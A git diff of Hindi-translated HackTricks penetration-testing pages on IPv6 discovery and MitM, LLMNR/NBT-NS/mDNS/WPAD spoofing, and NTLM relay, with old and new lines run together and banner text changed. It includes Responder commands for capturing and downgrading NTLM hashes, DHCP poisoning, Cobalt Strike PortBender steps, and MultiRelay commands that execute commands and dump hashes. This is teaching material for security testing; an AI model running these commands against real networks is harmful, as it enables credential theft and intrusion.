- **एनीकास्ट पता**: एक से निकटतम संचार के लिए। मार्गनिर्देशन प्रोटोकॉल के अनुसार सबसे निकट इंटरफेस पर भेजा जाता है। **`2000::/3`** वैश्विक यूनिकास्ट सीमा का हिस्सा। - **एनीकास्ट पता**: एक से निकटतम संचार के लिए। मार्गनिर्देशन प्रोटोकॉल के अनुसार सबसे निकट इंटरफेस पर भेजा जाता है। **`2000::/3`** वैश्विक यूनिकास्ट सीमा का हिस्सा।
## **पता प्रिफिक्स** ## **पता प्रिफिक्स**
- **fe80::/10**: लिंक-स्थानीय पते (169.254.x.x के समान) - **fe80::/10**: लिंक-स्थानीय पते (169.254.x.x के समान)
- **fc00::/7**: अद्वितीय स्थानीय-यूनिकास्ट (10.x.x.x, 172.16.x.x, 192.168.x.x जैसे निजी IPv4 सीमाएं के समान) - **fc00::/7**: अद्वितीय स्थानीय-यूनिकास्ट (10.x.x.x, 172.16.x.x, 192.168.x.x के समान)
- **2000::/3**: वैश्विक यूनिकास्ट - **2000::/3**: वैश्विक यूनिकास्ट
- **ff02::1**: मल्टीकास्ट सभी नोड्स - **ff02::1**: मल्टीकास्ट सभी नोड्स
- **ff02::2**: मल्टीकास्ट राउटर नोड्स - **ff02::2**: मल्टीकास्ट राउटर नोड्स
## **नेटवर्क के भीतर IPv6 पते खोजना** ## **नेटवर्क में IPv6 पते खोजना**
### तरीका 1: लिंक-स्थानीय पतों का उपयोग करना ### तरीका 1: लिंक-स्थानीय पतों का उपयोग करना
1. नेटवर्क के भीतर एक उपकरण का MAC पता प्राप्त करें। 1. नेटवर्क में एक उपकरण का MAC पता प्राप्त करें।
2. MAC पते से Link-local IPv6 पता निकालें। 2. MAC पते से Link-local IPv6 पता निकालें।
### तरीका 2: मल्टीकास्ट का उपयोग करना ### तरीका 2: मल्टीकास्ट का उपयोग करना
1. स्थानीय नेटवर्क पर IPv6 पतों को खोजने के लिए मल्टीकास्ट पते `ff02::1` पर पिंग भेजें। 1. स्थानीय नेटवर्क पर IPv6 पत खोजने के लिए मल्टीकास्ट पते `ff02::1` पर पिंग भेजें।
```bash ```bash
service ufw stop # Stop the firewall service ufw stop # Stop the firewall
ping6 -I <IFACE> ff02::1 # Send a ping to multicast address ping6 -I <IFACE> ff02::1 # Send a ping to multicast address
ip -6 neigh # Display the neighbor table ip -6 neigh # Display the neighbor table
``` ```
## IPv6 मैन-इन-द-मिडल (MitM) हमले ## IPv6 मैन-इन-द-मिडल (MitM) हमले
IPv6 नेटवर्क में MitM हमले करने के लिए कई तकनीकें मौजूद हैं, जैसे: IPv6 नेटवर्क में MitM हमले को करने के लिए कई तकनीकें मौजूद हैं, जैसे:
- ICMPv6 neighbor या राउटर विज्ञापनों का धोखा देना। - ICMPv6 नेबर या राउटर विज्ञापन का धोखा देना।
- रूटिंग को मानिपुरित करने के लिए ICMPv6 रीडायरेक्ट या "पैकेट टू बिग" संदेश का उपयोग करना। - रूटिंग को मानिपुलेट करने के लिए ICMPv6 रीडायरेक्ट या "पैकेट टू बिग" संदेश का उपयोग करना।
- मोबाइल IPv6 पर हमला करना (आम तौर पर IPSec को अक्षम करने की आवश्यकता होती है)। - मोबाइल IPv6 पर हमला करना (आम तौर पर IPSec को अक्षम करने की आवश्यकता होती है)।
- एक रोग DHCPv6 सर्वर सेट करना। - एक रोग DHCPv6 सर्वर सेट करना।
@ -92,36 +93,21 @@ IPv6 नेटवर्क में MitM हमले करने के ल
# ईल्ड में IPv6 पतों की पहचान # ईल्ड में IPv6 पतों की पहचान
## सबडोमेन्स की खोज ## सबडोमेन्स की खोज
IPv6 पतों से जुड़े सबडोमेन्स को खोजने का एक तरीका सर्च इंजन का उपयोग करना है। उदाहरण के लिए, `ipv6.*` जैसा क्वेरी पैटर्न अच्छा साबित हो सकता है। विशेष रूप से, निम्नलिखित सर्च कमांड Google में उपयोग किया जा सकता है: IPv6 पतों से जुड़े सबडोमेन्स को खोजने का एक तरीका सर्च इंजन का उपयोग करना है। उदाहरण के लिए, `ipv6.*` जैसा एक क्वेरी पैटर्न असरकारी हो सकता है। विशेष रूप से, निम्नलिखित सर्च कमांड का उपयोग Google में किया जा सकता है:
```bash ```bash
site:ipv6./ site:ipv6./
``` ```
## डीएनएस क्वेरी का उपयोग ## DNS क्वेरी का उपयोग
आईपीवी6 पते पहचानने के लिए, कुछ डीएनएस रिकॉर्ड प्रकारों का क्वेरी किया जा सकता है: IPv6 पतों की पहचान के लिए, कुछ DNS रिकॉर्ड प्रकारों का पूछताछ किया जा सकता है:
- **AXFR**: पूर्ण जोन ट्रांसफर का अनुरोध करता है, जिससे व्यापक डीएनएस रिकॉर्ड्स प्रकट हो सकते हैं - **AXFR**: पूर्ण जोन स्थानांतरण का अनुरोध करता है, जिससे व्यापक DNS रिकॉर्ड्स का पता लग सकता है
- **AAAA**: सीधे आईपीवी6 पतों की खोज करता है। - **AAAA**: सीधे IPv6 पतों की खोज करता है।
- **ANY**: सभी उपलब्ध डीएनएस रिकॉर्ड्स लौटाने वाला एक व्यापक क्वेरी। - **ANY**: सभी उपलब्ध DNS रिकॉर्ड्स लौटाने वाला एक व्यापक क्वेरी।
## पिंग6 के साथ प्रोबिंग ## Ping6 के साथ प्रोबिंग
संगठन से जुड़े आईपीवी6 पतों को पहचानने के बाद, `ping6` यूटिलिटी का उपयोग प्रोबिंग के लिए किया जा सकता है। यह उपकरण पहचाने गए आईपीवी6 पतों की प्रतिक्रियाशीलता का मूल्यांकन करने में मदद करता है, और संगत आईपीवी6 उपकरणों की खोज में भी सहायक हो सकता है। संगठन से जुड़े IPv6 पतों को पहचानने के बाद, `ping6` यूटिलिटी का उपयोग प्रोबिंग के लिए किया जा सकता है। यह उपकरण पहचाने गए IPv6 पतों की प्रतिक्रियाशीलता का मूल्यांकन करने में मदद करता है, और संगत IPv6 उपकरणों का खोजने में भी सहायक हो सकता है।
## संदर्भ ## संदर्भ
* [http://www.firewall.cx/networking-topics/protocols/877-ipv6-subnetting-how-to-subnet-ipv6.html](http://www.firewall.cx/networking-topics/protocols/877-ipv6-subnetting-how-to-subnet-ipv6.html) * [http://www.firewall.cx/networking-topics/protocols/877-ipv6-subnetting-how-to-subnet-ipv6.html](http://www.firewall.cx/networking-topics/protocols/877-ipv6-subnetting-how-to-subnet-ipv6.html)
* [https://www.sans.org/reading-room/whitepapers/detection/complete-guide-ipv6-attack-defense-33904](https://www.sans.org/reading-room/whitepapers/detection/complete-guide-ipv6-attack-defense-33904) * [https://www.sans.org/reading-room/whitepapers/detection/complete-guide-ipv6-attack-defense-33904](https://www.sans.org/reading-room/whitepapers/detection/complete-guide-ipv6-attack-defense-33904)
<details>
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>
HackTricks का समर्थन करने के अन्य तरीके:
* यदि आप अपनी कंपनी का विज्ञापन **HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live) पर **फॉलो** करें।
* **हैकिंग ट्रिक्स साझा करें** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में पीआर जमा करके।
</details>

View file

@ -1,62 +1,63 @@
# Spoofing LLMNR, NBT-NS, mDNS/DNS और WPAD और रिले अटैक # Spoofing LLMNR, NBT-NS, mDNS/DNS और WPAD और रिले अटैक
{% hint style="success" %}
AWS हैकिंग सीखें और प्रैक्टिस करें:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP हैकिंग सीखें और प्रैक्टिस करें: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details> <details>
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary> <summary>हैकट्रिक्स का समर्थन करें</summary>
HackTricks का समर्थन करने के अन्य तरीके: * [**सब्सक्रिप्शन योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
* **जुड़ें** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) से या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर **फॉलो** करें।
* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें! * **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स**](https://github.com/carlospolop/hacktricks) और [**हैकट्रिक्स क्लाउड**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके।
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
* **HackTricks** और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके अपने हैकिंग ट्रिक्स साझा करें।
</details> </details>
{% endhint %}
## नेटवर्क प्रोटोकॉल ## नेटवर्क प्रोटोकॉल
### स्थानीय होस्ट संकेत प्रोटोकॉल ### स्थानीय होस्ट संकेत प्रोटोकॉल
- **LLMNR, NBT-NS, और mDNS**: - **LLMNR, NBT-NS, और mDNS**:
- माइक्रोसॉफ्ट और अन्य ऑपरेटिंग सिस्टम LLMNR और NBT-NS का उपयोग करते हैं जब DNS विफल होता है। उसी तरह, Apple और Linux सिस्टम mDNS का उपयोग करते हैं। - माइक्रोसॉफ्ट और अन्य ऑपरेटिंग सिस्टम LLMNR और NBT-NS का उपयोग स्थानीय नाम संकेतन के लिए करते हैं जब DNS विफल होता है। उसी तरह, Apple और Linux सिस्टम mDNS का उपयोग करते हैं।
- ये प्रोटोकॉल अपने अथेंटिकेटेड, यूडीपी पर प्रसारित प्रकृति के कारण अंतर्दृष्टि और स्पूफिंग के लिए संवेदनशील हैं। - ये प्रोटोकॉल अपने अथेंटिकेटेड, यूडीपी पर प्रसारित प्रकृति के कारण अंतर्दृष्टि और स्पूफिंग के लिए संवेदनशील हैं।
- [Responder](https://github.com/lgandx/Responder) का उपयोग किया जा सकता है सेवाओं का अनुकरण करने के लिए जो इन प्रोटोकॉलों का प्रश्न कर रहे होस्ट्स को झूठे जवाब भेजकर - [Responder](https://github.com/lgandx/Responder) का उपयोग करके होस्ट जो इन प्रोटोकॉलों का प्रश्न कर रहे हैं को झूठे जवाब भेजकर सेवाओं का अनुकरण किया जा सकता है
- Responder का उपयोग करके सेवा अनुकरण के बारे में अधिक जानकारी [यहाँ](spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md) मिल सकती है। - Responder का उपयोग करके सेवा अनुकरण के बारे में अधिक जानकारी [यहाँ](spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md) मिल सकती है।
### वेब प्रॉक्सी ऑटो-डिस्कवरी प्रोटोकॉल (WPAD) ### वेब प्रॉक्सी ऑटो-डिस्कवरी प्रोटोकॉल (WPAD)
- WPAD ब्राउज़र को प्रॉक्सी सेटिंग्स को स्वचालित रूप से खोजने की अनुमति देता है। - WPAD ब्राउज़र को प्रॉक्सी सेटिंग्स को स्वचालित रूप से खोजने की अनुमति देता है।
- खोज DHCP, DNS के माध्यम से सुविधा प्रदान करता है, या DNS विफल होने पर LLMNR और NBT-NS में लौटने की सुविधा प्रदान करता है। - खोज DHCP, DNS के माध्यम से सुविधा प्रदान करता है, या DNS विफल होने पर LLMNR और NBT-NS में लौटता है।
- Responder द्वारा WPAD हमलों को स्वचालित कर सकता है, ग्राहकों को दुरुपयोगी WPAD सर्वरों पर निर्देशित करता है। - Responder WPAD अटैक को स्वचालित कर सकता है, ग्राहकों को दुरुपयोगी WPAD सर्वरों पर निर्देशित करता है।
### प्रोटोकॉल पॉइजनिंग के लिए Responder ### प्रोटोकॉल पॉइजनिंग के लिए Responder
- **Responder** एक उपकरण है जो LLMNR, NBT-NS, और mDNS क्वेरी को पॉइजन करने के लिए उपयोग किया जाता है, प्रश्न प्रकार के आधार पर चुनकर प्रतिक्रिया देता है, मुख्य रूप से SMB सेवाओं को लक्ष्य बनाता है। - **Responder** एक उपकरण है जो LLMNR, NBT-NS, और mDNS क्वेरी के लिए पॉइजनिंग के लिए उपयोग किया जाता है, प्रश्न प्रकार के आधार पर चुनकर प्रतिक्रिया देता है, मुख्य रूप से SMB सेवाओं को लक्षित करता है।
- यह Kali Linux में पूर्व-स्थापित है, `/etc/responder/Responder.conf` में कॉन्फ़िगर किया जा सकता है। - यह Kali Linux में पूर्व-स्थापित है, `/etc/responder/Responder.conf` में कॉन्फ़िगर किया जा सकता है।
- Responder स्क्रीन पर पकड़े गए हैश प्रदर्शित करता है और उन्हें `/usr/share/responder/logs` निर्देशिका में सहेजता है। - Responder द्वारा दर्ज किए गए हैश स्क्रीन पर प्रदर्शित करता है और उन्हें `/usr/share/responder/logs` निर्देशिका में सहेजता है।
- यह IPv4 और IPv6 दोनों का समर्थन करता है। - यह IPv4 और IPv6 दोनों का समर्थन करता है।
- Responder का Windows संस्करण यहाँ उपलब्ध है: [यहाँ](https://github.com/lgandx/Responder-Windows)। - Responder का Windows संस्करण [यहाँ](https://github.com/lgandx/Responder-Windows) उपलब्ध है
#### Responder चलाना #### Responder चलाना
- डिफ़ॉल्ट सेटिंग्स के साथ Responder चलाने के लिए: `responder -I <Interface>` - डिफ़ॉल्ट सेटिंग्स के साथ Responder चलाने के लिए: `responder -I <Interface>`
- अधिक प्रवेश के लिए प्रोबिंग (संभावित परिणामों के साथ): `responder -I <Interface> -P -r -v` - अधिक प्रोबिंग के लिए (संभावित प्रभावों के साथ): `responder -I <Interface> -P -r -v`
- NTLMv1 चैलेंज/प्रतिक्रिया को आसान क्रैकिंग के लिए कैप्चर करने के तकनीक: `responder -I <Interface> --lm --disable-ess` - NTLMv1 चैलेंज/प्रतिक्रिया को आसानी से क्रैक करने के लिए तकनीकें: `responder -I <Interface> --lm --disable-ess`
- WPAD अनुकरण को सक्रिय करने के लिए: `responder -I <Interface> --wpad` - WPAD अनुकरण को सक्रिय करने के लिए: `responder -I <Interface> --wpad`
- NetBIOS अनुरोधों को हमलवर के IP पर हल किया जा सकता है, और प्रमाणीकरण प्रॉक्सी सेट किया जा सकता है: `responder.py -I <interface> -Pv` - NetBIOS अनुरोधों को हमलवर के IP पर हल किया जा सकता है, और प्रमाणीकरण प्रॉक्सी सेट किया जा सकता है: `responder.py -I <interface> -Pv`
### Responder के साथ DHCP पॉइजनिंग ### Responder के साथ DHCP पॉइजनिंग
- DHCP प्रतिक्रियाओं को स्पूफ़ करने से एक पीड़ित का रूटिंग सूचना स्थायी रूप से पॉइजन की जा सकती है, ARP पॉइजनिंग के लिए एक गुप्त वैकल्पिकता प्रदान करती है। - DHCP प्रतिक्रियाओं को झूठलाने से एक पीड़ित का रूटिंग सूचना स्थायी रूप से पॉइजन किया जा सकता है, ARP पॉइजनिंग के लिए एक गुप्त विकल्प प्रदान करता है।
- लक्ष्य नेटवर्क के विन्यास के सटीक ज्ञान की आवश्यकता होती है। - इसे लक्ष्य नेटवर्क के विन्यास के सटीक ज्ञान की आवश्यकता होती है।
- हमल चलाने के लिए: `./Responder.py -I eth0 -Pdv` - हमले को चलाने के लिए: `./Responder.py -I eth0 -Pdv`
- यह विधि NTLMv1/2 हैश को प्रभावी ढंग से कैप्चर कर सकती है, लेकिन नेटवर्क विघटन से बचने के लिए सावधानी से हैंडल करने की आवश्यकता होती है - यह विधि NTLMv1/2 हैश को प्रभावी ढंग से कैप्चर कर सकती है, लेकिन नेटवर्क विघटन से बचने के लिए सावधानी से हैंडल करना चाहिए
### Responder के साथ क्रेडेंशियल कैप्चरिंग ### Responder के साथ क्रेडेंशियल कैप्चर
- Responder उपरोक्त प्रोटोकॉल का दुरुपयोग करके सेवाओं का अनुकरण करेगा, क्रेडेंशियल को कैप्चर करेगा (सामान्यत: NTLMv2 चैलेंज/प्रतिक्रिया) जब एक उपयोगकर्ता झूठी सेवाओं के खिलाफ प्रमाणीकरण करने का प्रयास करता है। - Responder उपरोक्त प्रोटोकॉलों का दुरुपयोग करके सेवाओं का अनुकरण करेगा, क्रेडेंशियल को कैप्चर करेगा (सामान्यत: NTLMv2 चैलेंज/प्रतिक्रिया) जब एक उपयोगकर्ता झूठी सेवाओं के खिलाफ प्रमाणीकरण करने का प्रयास करता है।
- क्रैकिंग के लिए NetNTLMv1 या ESS को अक्षम करने के लिए प्रयास किए जा सकते हैं - क्रैकिंग के लिए NTLMv1 या ESS को अक्षम करने के लिए नेटNTLMv1 की ओर डाउनग्रेड करने की कोशिश की जा सकती है
यह महत्वपूर्ण है कि इन तकनीकों का उपयोग कानूनी और नैतिक रूप से किया जाए, उचित अधिकृति सुनिश्चित की जाए और अवैध पहुंच या अनधिकृत पहुंच से बचा जाए। यह महत्वपूर्ण है कि इन तकनीकों का उपयोग कानूनी और नैतिक रूप से किया जाना चाहिए, सही अधिकारिकरण सुनिश्चित करते हुए और अवैध पहुंच या अनधिकृत पहुंच से बचते हुए।
## Inveigh ## Inveigh
Inveigh एक उपकरण है पेनेट्रेशन टेस्टर्स और रेड टीमर्स के लिए, विंडोज सिस्टम के लिए डिज़ाइन किया गया है। यह Responder के समान कार्यक्षमताएँ प्रदान करता है, स्पूफिंग और मैन-इन-द-मिडल हमले करता है। यह उपकरण एक PowerShell स्क्रिप्ट से C# बाइनरी में विकसित हुआ है, [**Inveigh**](https://github.com/Kevin-Robertson/Inveigh) और [**InveighZero**](https://github.com/Kevin-Robertson/InveighZero) मुख्य संस्करण हैं। विस्तृत पैरामीटर और निर्देशों की जानकारी [**विकि**](https://github.com/Kevin-Robertson/Inveigh/wiki/Parameters) में उपलब्ध है। Inveigh एक उपकरण है पेनेट्रेशन टेस्टर्स और रेड टीमर्स के लिए, विंडोज सिस्टमों के लिए डिज़ाइन किया गया है। यह Responder के समान कार्यक्षमताएँ प्रदान करता है, स्पूफिंग और मैन-इन-द-मिडल हमले करता है। यह उपकरण एक PowerShell स्क्रिप्ट से C# बाइनरी में विकसित हुआ है, [**Inveigh**](https://github.com/Kevin-Robertson/Inveigh) और [**InveighZero**](https://github.com/Kevin-Robertson/InveighZero) मुख्य संस्करण हैं। विस्तृत पैरामीटर और निर्देशों क [**विकि**](https://github.com/Kevin-Robertson/Inveigh/wiki/Parameters) में पाया जा सकता है।
Inveigh को PowerShell के माध्यम से चलाया जा सकता है: Inveigh को PowerShell के माध्यम से चलाया जा सकता है:
```powershell ```powershell
@ -74,7 +75,7 @@ Inveigh.exe
#### 445 पोर्ट फॉरवर्डिंग और टनलिंग #### 445 पोर्ट फॉरवर्डिंग और टनलिंग
उन परिस्थितियों में जहाँ सीधा नेटवर्क परिचय संभव नहीं है, पोर्ट 445 पर ट्रैफिक को फॉरवर्ड और टनल किया जाना चाहिए। [**PortBender**](https://github.com/praetorian-inc/PortBender) जैसे उपकरण सहायक होते हैं पोर्ट 445 ट्रैफिक को एक और पोर्ट पर पुनर्निर्देशित करने में, जो ड्राइवर लोडिंग के लिए स्थानीय व्यवस्थापक एक्सेस उपलब्ध होने पर आवश्यक है उन परिस्थितियों में जहाँ सीधा नेटवर्क परिचय संभव नहीं है, पोर्ट 445 पर ट्रैफिक को फॉरवर्ड और टनल करने की आवश्यकता होती है। [**PortBender**](https://github.com/praetorian-inc/PortBender) जैसे उपकरण सहायक होते हैं पोर्ट 445 ट्रैफिक को एक और पोर्ट पर पुनर्निर्देशित करने में, जो जरुरी होता है जब ड्राइवर लोडिंग के लिए स्थानीय व्यवस्थापक एक्सेस उपलब्ध हो।
कोबाल्ट स्ट्राइक में PortBender सेटअप और ऑपरेशन: कोबाल्ट स्ट्राइक में PortBender सेटअप और ऑपरेशन:
```bash ```bash
@ -96,13 +97,13 @@ beacon> socks stop
- **Metasploit**: प्रॉक्सी, स्थानीय और दूरस्थ होस्ट विवरण के साथ सेटअप करें। - **Metasploit**: प्रॉक्सी, स्थानीय और दूरस्थ होस्ट विवरण के साथ सेटअप करें।
- **smbrelayx**: SMB सत्रों को रिले करने और कमांड या बैकडोअर लागू करने के लिए एक Python स्क्रिप्ट। - **smbrelayx**: SMB सत्रों को रिले करने और कमांड या बैकडोअर लागू करने के लिए एक Python स्क्रिप्ट।
- **MultiRelay**: एक उपकरण Responder सुइट से, विशिष्ट उपयोगकर्ताओं या सभी उपयोगकर्ताओं को रिले करने, कमांड चलाने या हैश डंप करने के लिए। - **MultiRelay**: एक उपकरण Responder सुइट से, विशिष्ट उपयोगकर्ताओं या सभी उपयोगकर्ताओं को रिले करने, कमांड निष्पादित करने, या हैश डंप करने के लिए।
हर उपकरण को यदि आवश्यक हो तो एक SOCKS प्रॉक्सी के माध्यम से संचित किया जा सकता है, जो अप्रत्यक्ष नेटवर्क एक्सेस के साथ भी हमले को संभावित बनाता है। प्रत्येक उपकरण को यदि आवश्यक हो तो एक SOCKS प्रॉक्सी के माध्यम से संचालित किया जा सकता है, जो अप्रत्यक्ष नेटवर्क एक्सेस के साथ भी हमले को संभावित बनाता है।
### MultiRelay ऑपरेशन ### MultiRelay ऑपरेशन
MultiRelay को _**/usr/share/responder/tools**_ निर्देशिका से निर्वाहित किया जाता है, विशिष्ट आईपी या उपयोगकर्ताओं को लक्षित करके MultiRelay को _**/usr/share/responder/tools**_ निर्देशिका से निर्वाहित किया जाता है, विशिष्ट आईपी या उपयोगकर्ताओं को लक्ष्य बनाते हुए
```bash ```bash
python MultiRelay.py -t <IP target> -u ALL # Relay all users python MultiRelay.py -t <IP target> -u ALL # Relay all users
python MultiRelay.py -t <IP target> -u ALL -c whoami # Execute command python MultiRelay.py -t <IP target> -u ALL -c whoami # Execute command
@ -110,9 +111,9 @@ python MultiRelay.py -t <IP target> -u ALL -d # Dump hashes
# Proxychains for routing traffic # Proxychains for routing traffic
``` ```
### Force NTLM Logins ### एनटीएलएम रिले हमले का प्रयास करें
Windows में आपको **कुछ विशेषाधिकारी खातों को विभिन्न मशीनों पर प्रमाणीकृत करने के लिए मजबूर किया जा सकता है**। निम्नलिखित पृष्ठ को पढ़ें और जानें कैसे: Windows में आप **कुछ विशेषाधिकारी खातों को अनियमित मशीनों पर प्रमाणीकृत करने के लिए सक्षम हो सकते हैं**। निम्नलिखित पृष्ठ को पढ़ें और जानें कैसे:
{% content-ref url="../../windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md" %} {% content-ref url="../../windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md" %}
[printers-spooler-service-abuse.md](../../windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md) [printers-spooler-service-abuse.md](../../windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md)
@ -126,16 +127,17 @@ Windows में आपको **कुछ विशेषाधिकारी
* [https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html](https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html) * [https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html](https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html)
{% hint style="success" %}
AWS हैकिंग सीखें और अभ्यास करें:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP हैकिंग सीखें और अभ्यास करें: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details> <details>
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary> <summary>हैकट्रिक्स का समर्थन करें</summary>
HackTricks का समर्थन करने के अन्य तरीके: * [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) और **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** को** **फॉलो** करें।
* यदि आप चाहते हैं कि आपकी **कंपनी HackTricks में विज्ञापित हो** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें! * **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके।
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) वाले [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
* **अपने हैकिंग ट्रिक्स साझा करें** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके।
</details> </details>
{% endhint %}

View file

@ -1,55 +1,56 @@
# ईविल ट्विन EAP-TLS # शैतान ट्विन EAP-TLS
{% hint style="success" %}
**AWS हैकिंग सीखें और अभ्यास करें:**<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम विशेषज्ञ (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
**GCP हैकिंग सीखें और अभ्यास करें:** <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम विशेषज्ञ (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details> <details>
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> <summary>HackTricks का समर्थन करें</summary>
HackTricks का समर्थन करने के अन्य तरीके: * [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर **फॉलो** करें।
* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स देखें**](https://github.com/sponsors/carlospolop)! * **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **हमें** **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
* **हैकिंग ट्रिक्स साझा करें द्वारा PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details> </details>
{% endhint %}
